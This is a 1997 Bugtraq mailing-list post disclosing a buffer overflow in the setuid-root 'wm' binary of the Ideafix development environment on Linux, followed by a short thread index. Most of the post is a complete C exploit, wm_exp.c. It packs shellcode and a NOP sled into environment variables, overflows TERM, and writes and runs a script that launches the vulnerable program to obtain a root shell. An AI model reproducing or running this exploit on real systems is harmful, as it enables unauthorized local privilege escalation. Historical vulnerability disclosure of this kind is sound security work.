Bugtraq mailing list archives
Re: WinNT syscalls insecurity
From: bst () INAME COM (Bst Perez Companc)
Date: Sun, 19 Oct 1997 05:04:18 -0400
A vulnerability exist in the package Ideafix distributed with several versions of linux. [ ftp://sunsite.unc.edu/pub/Linux/devel/ideafix ] [ ftp://ftp.inter-soft.com/pub/ideafix ]. This is a very popular development enviroment here in Argentina. Due to the lack of proper bounds checking in the setuid root program wm, the enviroment variable TERM is copied into a local fixedsize buffer, you guess it, a shell with euid=0 Comments: bisti <bst () iname com> Greetz to fidel, larry, rb, rnt, veida. [--------------------------- wm_exp.c ---------------------------] /* * 'Ideafix wm' Exploit 4 Linux. */ #include <stdio.h> #include <stdlib.h> #define TERMSIZE 2000 #define HUEVOSIZE 5000 char *shell = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; long esp(void) { __asm__("movl %esp,%eax\n"); } int main(void) { char *ptr, *bof, *egg; long *addr_ptr, addr; int i; if ( !(bof = malloc(TERMSIZE)) ) { printf("NoMoreMemory4bof.\n"); exit(1); } if ( !(egg = malloc(HUEVOSIZE)) ) { printf("NoMoreMemory4egg.\n"); exit(1); } addr = esp(); addr_ptr = (long *) bof; for (i = 0; i < TERMSIZE; i += 4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i <= HUEVOSIZE - strlen(shell) - 2; i++) *(ptr++) = 0x90; for( i = 0; i < strlen(shell); i++) *(ptr++) = shell[i]; bof[TERMSIZE - 1] = '\0'; egg[HUEVOSIZE - 1] = '\0'; memcpy(bof, "BOF=", 4); memcpy(egg , "EGG=", 4); putenv(bof); putenv(egg); system("echo '#!/bin/sh' >> doit"); system("echo -n '# We kill any instance of wm, set TERM, ' >> doit"); system("echo 'and run the vulnerable program.' >> doit"); system("echo '# Bisti [111097]' >> doit"); system("echo 'killall wm' >> doit"); system("echo 'TERM=$BOF;export TERM' >> doit"); system("echo '/usr/local/inter-soft/ideafix-4.3.2/bin/wm' >> doit"); system("sh ./doit"); } [---------------------------------------------------------------------------]
Current thread:
- Re: WinNT syscalls insecurity Bst Perez Companc (Oct 19)
- <Possible follow-ups>
- Re: WinNT syscalls insecurity David LeBlanc (Oct 19)
- SNI-19: BSD lpd vulnerabilities (UPDATE) Secure Networks Inc. (Oct 21)
- Re: WinNT syscalls insecurity Solar Designer (Oct 21)
- SNI-20: Telnetd tgetent vulnerability Secure Networks Inc. (Oct 21)
- Re: SNI-20: Telnetd tgetent vulnerability Theo de Raadt (Oct 21)
- Majordomo and EXPN James Ponder (Oct 22)
- Re: remotely kill solaris syslogd Jason R Mastaler (Oct 21)